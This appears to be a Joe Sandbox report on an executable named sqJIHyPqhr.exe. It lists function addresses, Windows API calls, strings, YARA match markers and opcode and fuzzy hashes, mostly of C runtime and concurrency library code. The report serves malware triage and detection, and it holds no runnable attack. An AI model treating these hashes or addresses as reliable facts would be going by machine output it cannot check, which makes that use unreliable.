Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 48f645909cc2dd73e768aaf9b1fe1f86295fd31cbcc1c2a3b01f66e5ebcdc08a
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 8C41D638A002489BCF55DF6DC844AAF7BA5AF45328F24816FD9155B391D7329901CF91

Function 024CF97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\sqJIHyPqhr.exe,00000104), ref: 024CF9BA
_free.LIBCMT ref: 024CFA85
_free.LIBCMT ref: 024CFA8F

Strings

C:\Users\user\Desktop\sqJIHyPqhr.exe, xrefs: 024CF9B1, 024CF9B8, 024CF9E7, 024CFA1F

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\sqJIHyPqhr.exe
API String ID: 2506810119-2110814710
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: 6581aea0a8cce75bbcb65e8b62c5d1056867072f303436d1770489a78802dc81
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: 63319179A00218EFCB61DF99DC8099EFBFEEF89710B21406FE80497611D7759A44CB90

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\sqJIHyPqhr.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\sqJIHyPqhr.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\sqJIHyPqhr.exe
API String ID: 2506810119-2110814710
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 024AC87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 024AC8DE

Strings

ios_base::failbit set, xrefs: 024AC8AB
ios_base::eofbit set, xrefs: 024AC8B0
ios_base::badbit set, xrefs: 024AC8A1, 024AC8C1

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: 187907d8abdc134cd430c3ca2f84676dece580684b71ee6fdc1f5c34ddd58064
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: 96F05673C405086BCB84D554CCD1BEF3394AF35316F14806FDD516B182E7649945CF64

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

version, xrefs: 00415D9F
pScheduler, xrefs: 00415DB2

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 024D5AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 024D5B8A
__alldvrm.LIBCMT ref: 024D5D8B
__alldvrm.LIBCMT ref: 024D5DAD

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: b4405464e19b0dc298fad9744c80a1f53af14036d9757ee6f985d8047dda8329
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: BEA17971A003869FEB21CF18C8A17AEBFE1EF15314F58856FD4959B381CB348941CB60

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 024DFC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024DFD9E

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: e7df2c428167953df3a8ce607b34c69569abfb84f586d545c4d94771cc70ca27
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: C2412C31A005016BDB356FBE8C64BAF3AA6EF45770F25061FF42BD6790D73484458A61

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 024D6B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024D047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024D6B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024D6BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024D6BEC
__freea.LIBCMT ref: 024D6BF5

Part of subcall function 024D390E: RtlAllocateHeap.NTDLL(00000000,024ADAD7,00000000), ref: 024D3940

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction ID: 557f8b47102cdc03be34a57eac576b1a8ea27deb4fb7d79e6864e6129abe93c3
Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction Fuzzy Hash: EB31F232A0021AABDF24CF69DC50DAF7BA9EF40714F16426EEC04D7250EB36D951CB90

Function 024AD652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 024AD6AA
__Xtime_diff_to_millis2.LIBCPMT ref: 024AD6C4
_xtime_get.LIBCPMT ref: 024AD6E7
__Xtime_diff_to_millis2.LIBCPMT ref: 024AD6F3

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction ID: c3fe6b64d0a456c139dcdf6359c73c9aa77648c972055175234ff4c0cb64a553
Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction Fuzzy Hash: CF214C75E00209AFDF04EFA5CC919BEB7B9EF19714F10006AE501A7290D774AD018BA0

Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0040D443
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D45D
_xtime_get.LIBCPMT ref: 0040D480
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D48C

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5

Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 024C9330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 024C934A

Part of subcall function 024C9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024C92C6
Part of subcall function 024C9297: ___AdjustPointer.LIBCMT ref: 024C92E1

_UnwindNestedFrames.LIBCMT ref: 024C935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024C9370
CallCatchBlock.LIBVCRUNTIME ref: 024C9398

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: ad27e341c46a535322c0f513c487e74181f2019cfbe5bf93ed3580ad009ddaec
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 1D011776100148BBCF526E9ADC40EEB7F6AEF88754F15441DFE4896120D772E861ABA0

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 024D5196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024D513D,00000000,00000000,00000000,00000000,?,024D53F5,00000006,0044A378), ref: 024D51C8
GetLastError.KERNEL32(?,024D513D,00000000,00000000,00000000,00000000,?,024D53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024D2213), ref: 024D51D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024D513D,00000000,00000000,00000000,00000000,?,024D53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024D51E2

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 552dda3732bb3c52ecd014d8ceae91a5cf7b332597ad1a6936fb260408ad7ce7
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 04012B36B02222ABC7224F799C54F5BBB98BF46FA27500631F906E7240CF20D941CAE4

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 024C6395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024C63AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024C63C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024C63DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024C63F3

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: c2b02142adbf2f68e3881d67e48a27cd00d560d4dc489de0a02583b256b3062f
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901A23A600114A7CF56EA5DC840AEF779E9FC5350F11401FEC21AB391DAB0ED118AA0

Function 024C2B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 024C2BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024C2BCF

Part of subcall function 024B8687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024B86A8
Part of subcall function 024B8687: Hash.LIBCMT ref: 024B86E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024C2BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024C2BF8

Part of subcall function 024BF6DF: Hash.LIBCMT ref: 024BF6F1

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: e755e83e7e048e2417bcd282ecff3cd39d6bce6465bb2aa26793613a3b829afc
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: 2C118E76400204AFC715DF65C880ACAF7B9BF59320F114A1FE95A8B551DBB0E904CBA0

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
